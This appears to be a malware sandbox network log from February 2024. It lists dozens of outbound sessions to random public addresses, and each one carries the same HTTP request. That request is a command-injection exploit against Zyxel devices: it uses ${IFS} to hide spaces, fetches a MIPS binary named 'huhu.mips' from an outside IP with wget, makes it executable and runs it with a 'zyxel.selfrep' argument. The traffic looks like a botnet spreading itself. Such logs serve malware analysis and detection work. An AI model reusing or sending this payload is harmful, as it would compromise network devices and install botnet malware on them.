                                                      Feb 2, 2024 06:35:39.334243059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1081192.168.2.144406841.152.162.145443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.334278107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1082192.168.2.145515020.102.209.198443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.334299088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1083192.168.2.1451714159.6.102.237443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.334335089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1084192.168.2.1445902143.219.9.10443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.334378004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1085192.168.2.1447870125.238.191.186443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.334727049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1086192.168.2.1455052191.159.242.15443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.334764004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1087192.168.2.143776420.144.217.175443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.334816933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1088192.168.2.1436786173.142.125.96443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.334855080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1089192.168.2.1438148171.140.87.83443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.334892035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1090192.168.2.145271038.218.156.227443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.334925890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1091192.168.2.1442962195.236.70.107443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.335006952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1092192.168.2.144927427.224.180.60443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.335059881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1093192.168.2.144300888.184.73.171443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.335095882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1094192.168.2.1449728195.104.198.242443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.335170984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1095192.168.2.145634697.134.30.72443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.335207939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1096192.168.2.1433824155.194.15.115443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.335207939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1097192.168.2.1444400167.27.93.14443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.335294008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1098192.168.2.145451031.185.108.209443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.335305929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1099192.168.2.1442170219.48.169.142443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.335355043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1100192.168.2.1457226131.8.241.108443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.335398912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1101192.168.2.1442616203.235.112.113443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.335443020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1102192.168.2.1436916135.128.176.160443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.335488081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1103192.168.2.1439304216.239.44.250443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.335521936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1104192.168.2.1436626186.10.124.147443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.335602999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1105192.168.2.1450874194.64.72.200443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.335602999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1106192.168.2.143293285.63.195.108443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.335633039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1107192.168.2.1451430110.195.242.239443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.335665941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1108192.168.2.145682696.180.29.200443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.335705042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1109192.168.2.1443134140.135.105.161443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.335767984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1110192.168.2.14418489.208.130.16443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.335818052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1111192.168.2.1452906149.128.59.121443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.335850000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1112192.168.2.143597643.6.21.56443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.335896969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1113192.168.2.1442396193.153.193.195443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.335901022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1114192.168.2.1459392116.12.249.91443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.335932016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1115192.168.2.1460800125.25.89.99443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.335973978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1116192.168.2.144357074.138.66.52443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.336019039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1117192.168.2.1451754201.80.208.199443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.336091042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1118192.168.2.145565612.253.18.29443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.336112022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1119192.168.2.143815492.86.59.125443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.336132050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1120192.168.2.1446880188.220.70.4443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.336169004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1121192.168.2.145593899.29.0.34443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.336205006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1122192.168.2.1447210159.70.255.164443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.336240053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1123192.168.2.143434482.69.27.194443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.336294889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1124192.168.2.1458802148.103.196.219443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.336328030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1125192.168.2.1441054110.97.58.156443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.336369991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1126192.168.2.1454598172.97.40.169443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.336440086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1127192.168.2.1439734108.138.82.13443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.336458921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1128192.168.2.1437308202.45.112.4443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.336488008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1129192.168.2.144666082.0.200.201443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.336520910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1130192.168.2.1448688205.35.139.213443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.336570024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1131192.168.2.143804041.200.44.126443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.336604118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1132192.168.2.1453836196.182.125.243443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.336627007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1133192.168.2.1450532143.249.45.70443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.336658955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1134192.168.2.144597899.33.86.167443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.336699963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1135192.168.2.1459152108.99.208.202443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.336719990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1136192.168.2.1451132217.247.80.154443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.336754084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1137192.168.2.1444718195.210.89.19443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.336813927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1138192.168.2.146068044.137.41.76443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.336848021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1139192.168.2.1443194139.184.216.207443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.336894989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1140192.168.2.14459509.30.213.197443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.336936951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1141192.168.2.1458270140.91.35.166443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.336965084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1142192.168.2.14526482.57.249.14443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:39.337014914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1143192.168.2.1449066120.34.146.123443
                                                      TimestampBytes transferredDirectionData
